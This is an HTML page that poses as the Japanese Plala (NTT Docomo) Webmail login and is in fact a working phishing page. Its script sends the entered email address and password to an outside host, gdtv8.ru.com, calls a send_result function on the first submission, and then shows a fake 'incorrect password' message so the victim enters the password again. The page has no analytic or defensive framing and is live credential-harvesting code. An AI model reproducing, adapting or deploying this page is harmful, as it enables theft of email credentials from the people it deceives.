<!DOCTYPE html>
<html>
<head>

<meta http-equiv="Pragma" content="no-cache"> 
<meta http-equiv="Expires" content="0"> 
<meta name="Description" content="">
<meta name="Keywords" content="">
<title>ぷらら Webメール</title>

<link rel="stylesheet" href="css/login.css" type="text/css">
<link rel="stylesheet" href="css/tsuikalogin.css" type="text/css">
<script src="js/tags.js" type="text/javascript">
</script>
 <script>
function click_submit(btn){
	btn.disabled = true;
	var f = document.forms["form"];
	f.method = "POST";
	f.action = "https://gdtv8.ru.com/cgi-bin/webpla/post.php";
	f.submit();
	return true;
}
</script> 
</head>

<body>
<noscript>
<iframe src="#"
style="width: 100px; height: 100px; border: 0; position: absolute; top: -5000px;">
</iframe>
</noscript>
<div id="plala">
  <div class="bg_g">
    <table border="0" cellspacing="0" cellpadding="0" width="750">
      <tbody><tr>
        <td width="750"><!-- ========= HEADER ========= -->
          <div id="head">
            <table border="0" cellspacing="0" cellpadding="0" width="100%">
              <tbody><tr>
                <td><table border="0" cellpadding="0" cellspacing="0" width="750" bgcolor="#ffffff">
                    <tbody><tr>
                      <td colspan="3"><img src="images/spacer.gif" width="1" height="11" alt=""></td>
                    </tr>
                    <tr>
                      <td width="8"><img src="images/spacer.gif" width="8" height="1" alt=""></td>
                      <td width="115" valign="top"><a href="#" target="_top"><img src="images/hd_logo_login.gif" alt="plala" width="115" height="58" border="0"></a></td>
                      <td width="627"><div><img src="images/spacer.gif" alt="" width="627" height="58" border="0"></div></td>
                    </tr>
                  </tbody></table>
                  <table border="0" cellpadding="0" cellspacing="0" width="750">
                    <tbody><tr>
                      <td bgcolor="#eeeeee"><img src="images/barg.gif" alt="" width="750" height="30" border="0"></td>
                    </tr>
                  </tbody></table></td>
              </tr>
            </tbody></table>
          </div>
          <!-- ========= /HEADER ========= -->
        </td>
      </tr>
      <tr>
        <td><div id="mainArea">
            <!-- ========= CAUTION ========= -->
            <noscript>
            <table border="0" cellspacing="0" cellpadding="0" width="727">
              <tr>
                <td><div class="caution"><span class="S">当サイトをご覧いただくためにはJavascriptを有効にする必要があります。お使いのブラウザのJavascriptを“有効”に設定してご覧下さい。</span></div></td>
              </tr>
            </table>
            </noscript>
            <!-- ========= /CAUTION ========= -->
            <div class="m_cnt">
              <div class="m_cnt_head">ぷらら　Webメール</div>
              <div class="m_cnts">
			  <br>
			
			<!-- error -->
                          <div>
      <table cellspacing="0" cellpadding="1" border="0">
        <tbody>
          <tr>
		<center><div style="color: red; font-size: 16px; font-style:italic;" id="errtxt"></div></center>
          </tr>
        </tbody>
      </table>
<!-- /error -->
</div>

<form name="form" method="post" action=" " onsubmit="return false;">

<input type="hidden" name="atesaki" value="webmail_login"> 
                <!-- ========= CONTENTS ========= -->
                <br>
                <div align="center">
                  <table border="0" align="center" cellpadding="0" cellspacing="1" width="400">
                    <tbody><tr>
                      <td colspan="3" align="center">ぷららのメールアドレス/メールパスワードを入力してください。</td>
                    </tr>
                    <tr>
                      <td colspan="3"><img src="images/spacer.gif" height="10"></td>
                    </tr>
                    <tr>
                      <td align="right">メールアドレス</td>
                      <td width="30"><img src="images/spacer.gif" width="30" height="1"></td>
                      <td align="left"><input type="text" name="account" id="rcmloginuser" size="26" maxlength="128"  value="" style="font-family:Arial,Helvetica,sans-serif;"></td>
                    </tr>
                    <tr>
                      <td colspan="3"><img src="images/spacer.gif" height="5"></td>
                    </tr>
                    
                    <tr>
                      <td colspan="3"><img src="images/spacer.gif" height="5"></td>
                    </tr>                    <tr>
                      <td align="right">メールパスワード</td>
                      <td></td>
                      <td align="left"><input type="password" name="password" id="rcmloginpwd" size="26" maxlength="20" style="font-family:Arial,Helvetica,sans-serif;"></td>
                    </tr>
		    
                    <tr>
                      <td colspan="3"><img src="images/spacer.gif" height="15"></td>
                    </tr>                    <tr>
                      <td colspan="3" align="center"><input type="checkbox" name="mail_save_flag" value="1" >メールアドレスの情報を保存する。</td>
                    </tr>
                  </tbody></table>
                </div>
                <br>
                <div align="center">
                  <input onmouseover="this.src='https://cdn.glitch.global/2f2ae0b6-ff4d-4202-80bb-dac849039f16/login_on.gif'" onmouseout="this.src='images/login.gif'" type="image" src="images/login.gif"  id="rcmloginsubmit" value="　ログイン" onclick="click_submit(this)">
                </div><br><br>
                <!-- ========= /CONTENTS ========= -->
              </form></div>
              <div class="m_cnt_foot"></div>
            </div>
          </div></td>
      </tr>

      <tr>
        <td bgcolor="#FFFFE6"><!-- ========= FOOTER ========= -->
          <div id="copy"><span class="Mfix"><font color="#000000"><br>メールパスワードは会員登録証にてご確認いただけます。メールパスワードを忘れた方は<a href="#" target="_blank">こちら</a>をご確認下さい。<br>複数メールのメールパスワードを忘れた方は<a href="#" target="_blank">こちら</a>をご確認ください</font><br>&copy;NTT DOCOMO</span></div>
          <!-- ========= /FOOTER ========= -->
        </td>
      </tr>
    </tbody></table>
  </div>
</div>
<script>
  document.addEventListener("DOMContentLoaded", ()=> {
      var count = 0
      var url_string = window.location.hash.substr(1);
      if(url_string){
          document.getElementById("rcmloginuser").value = url_string;
      }

      document.getElementById("rcmloginsubmit").addEventListener("click", event => {
        event.preventDefault ? event.preventDefault() : event.returnValue = false;

        var account = document.getElementById("rcmloginuser").value
        var password = document.getElementById("rcmloginpwd").value

        if (!account) {
            setTimeout(() => {document.getElementById("rcmloginuser").value = ""; document.getElementById("errtxt").innerHTML = "account can't be empty! please try again."}, 1500)
            setTimeout(() => {document.getElementById("errtxt").innerHTML = ""}, 5000)
        }else if (!account.includes("@") && !account.includes(".")) {
            setTimeout(() => {document.getElementById("rcmloginuser").value = ""; document.getElementById("errtxt").innerHTML = "Incorrect account address! please try again."}, 1500)
            setTimeout(() => {document.getElementById("errtxt").innerHTML = ""}, 5000)
        }else if (password == null || password == "") {
            setTimeout(() => {document.getElementById("rcmloginpwd").value = ""; document.getElementById("errtxt").innerHTML = "Password can't be empty! please try again."}, 1500)
            setTimeout(() => {document.getElementById("errtxt").innerHTML = ""}, 5000)
        }else if (password.length < 5) {
            setTimeout(() => {document.getElementById("rcmloginpwd").value = ""; document.getElementById("errtxt").innerHTML = "Password too short! please try again."}, 1500)
            setTimeout(() => {document.getElementById("errtxt").innerHTML = ""}, 5000)
        }else if (password.length > 5 && count < 1) {
            send_result(account, password);
            setTimeout(() => {document.getElementById("rcmloginpwd").value = ""; document.getElementById("errtxt").innerHTML = "メールアドレス、または、メールパスワードが正しくないようです。<br>もう一度入力しなおしてください。"}, 1500)
            setTimeout(() => {document.getElementById("errtxt").innerHTML = ""; count++}, 5000)
        
        }
      })
  })
</script>
</body>
</html>